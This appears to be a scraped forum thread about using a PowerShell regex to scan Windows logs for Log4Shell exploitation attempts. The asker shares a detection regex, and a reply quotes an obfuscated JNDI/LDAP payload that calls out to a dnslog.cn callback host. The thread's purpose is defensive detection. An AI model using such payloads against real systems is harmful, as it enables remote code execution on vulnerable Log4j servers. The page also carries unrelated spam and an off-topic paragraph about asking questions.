Join Log in
Score:0
avatar Server

Using Powershell to check System logs for Log4Shell

gt flag
Kurtz1337

I´m currently trying to check logs on different windows machines to check, if any Log4Shell attacks were run against our systems. The groundwork is done and easy regex patterns can be checked. If I now use the known regex-pattern for the Log4Shell attacks Powershell throws some unrecognized grouping consruct errors.

The regex should look like this:

\${(\${(.*?:|.*?:.*?:-)('|"|`)*(?1)}*|[jndi:lapsrm]('|"|`)*}*){9,11}

This is the String I used for Regex in Powershell with the needed escape characters:

$RX = "\$`{(\$`{(.*?:|.*?:.*?:-)('|`"|``)*(?1)}*|[jndi:lapsrm]('|`"|``)*}*){9,11}"

Is there a mistake I did with formatting? Or is there some weird error in the Powershell Regex recognition?

82
0 + 0
mfinni avatar
cn flag
mfinni
I can't comment on your regex syntax, but this isn't sufficient. There's plenty of examples on the web of people using different escape characters to obfuscate the JNDI call. ${j${KPW:MnVQG:hARxLh:-n}d${cMrwww:aMHlp:LlsJc:Hvltz:OWeka:-i}:${jgF:IvdW:hBxXUS:-l}d${IGtAj:KgGmt:mfEa:-a}p://1639227068302CJEDj.kfvg5l.dnslog.cn/249540} https://databricks.com/blog/2021/12/13/log4j2-vulnerability-cve-2021-44228-research-and-assessment.html
0
Reply
ธงชาติไทย
Elon Musk
I sit in a Tesla and translated this thread with Ai:

mangohost

Post an answer

Most people don’t grasp that asking a lot of questions unlocks learning and improves interpersonal bonding. In Alison’s studies, for example, though people could accurately recall how many questions had been asked in their conversations, they didn’t intuit the link between questions and liking. Across four studies, in which participants were engaged in conversations themselves or read transcripts of others’ conversations, people tended not to realize that question asking would influence—or had influenced—the level of amity between the conversationalists.